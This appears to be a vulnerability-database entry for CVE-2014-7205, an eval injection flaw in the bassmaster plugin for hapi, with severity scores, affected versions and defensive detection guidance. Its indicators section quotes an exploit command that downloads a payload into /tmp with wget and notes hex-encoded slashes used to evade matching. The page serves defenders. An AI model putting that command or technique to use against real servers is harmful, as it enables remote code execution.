cbcvebase.
CVE-2014-7205
published 2014-10-08

CVE-2014-7205: Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js…

PriorityP274critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
78.58%
99.5th percentile
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js allows remote attackers to execute arbitrary Javascript code via unspecified vectors.

Affected

2 ranges
VendorProductVersion rangeFixed in
bassmaster_projectbassmaster< 1.5.21.5.2
bassmaster_projectbassmaster>= 0 < 1.5.21.5.2

Detection & IOCsextracted from sources · hover to see the quote

path/batch
port8080
commandwget ${@service_url} -O \x2ftmp\x2f${@bd};
  • Detect POST requests to the /batch endpoint containing nested JSON with a 'requests' array where a 'path' value includes JavaScript injection patterns such as appended expressions (e.g., +'<string>') matching the regex /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g
  • Flag HTTP POST requests to /batch with Content-Type application/json where path values in the requests array contain JavaScript operators or string concatenation characters (e.g., +', eval-injectable payloads) beyond normal path characters
  • Look for use of \x2f (hex-encoded forward slash) in HTTP request bodies targeting the batch endpoint, used to bypass regex matching while injecting code
  • Monitor for outbound wget requests from the Node.js server process to attacker-controlled hosts on non-standard ports (default 1337), followed by execution of a newly written binary in /tmp/
  • ·The vulnerable route path (/batch) and server port (8080) are defaults from the examples/batch.js file; production deployments may use different paths and ports, requiring tuning of detection rules accordingly.
  • ·The exploit targets unauthenticated access to the batch endpoint; if the deployment requires authentication, the attack surface is reduced but the underlying eval injection vulnerability in lib/batch.js still exists in bassmaster < 1.5.2.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.